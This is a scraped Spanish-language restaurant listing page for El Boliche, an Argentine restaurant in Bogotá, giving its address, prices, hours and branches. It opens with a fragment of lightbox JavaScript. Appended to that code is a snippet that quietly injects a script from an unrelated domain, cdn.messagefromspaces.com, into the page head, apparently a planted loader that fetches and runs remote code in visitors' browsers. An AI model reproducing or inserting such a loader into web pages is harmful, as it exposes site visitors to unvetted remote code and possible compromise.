, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

El Boliche

El Boliche

Dirección: Calle 69A #10 – 23
Zona:
Chapinero
Precio Promedio Plato por Persona: 
$20.000  y $30.000 pesos
Formas de Pago:  
Recibe Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Categoria: Argentina

El Boliche, tiene un ambiente y una decoración excelente, con una terraza a la sombra de un gran árbol que proporciona sombra, frescura y un rico aroma. El lugar es acogedor y el servicio hace que te sientas como en casa. La especialidad del restaurante son pastas y milanesas argentinas para que el cliente pueda hacer la combinación que quiera.

Con más de treinta años de tradición, el restaurante El Boliche tiene un menú preparado con ingredientes frescos de la mejor calidad, compuesto de recetas cuidadosamente seleccionadas en las que nada está dado al azar.

Los clientes de El Boliche van ante todo a relajarse, en un plan tranquilo, para disfrutar de las recetas caseras, refinadas y cuidadosamente elaboradas. Y para los amantes de la noche, los jueves se tornan más interesantes con guitarrista en vivo. Además cuenta con servicio a domicilio para la comodidad de su clientela.

Platos recomendados:

- Raviolis de salmón

Horario:

Lunes a Sábado 12:00m. a 10:30p.m.
Domingos y Festivos 12:00m. a 4:30p.m.

Sucursales:

Teusaquillo:
Cra. 13 # 35-43

Macarena:
Calle 27 # 5-66

Deja un comentario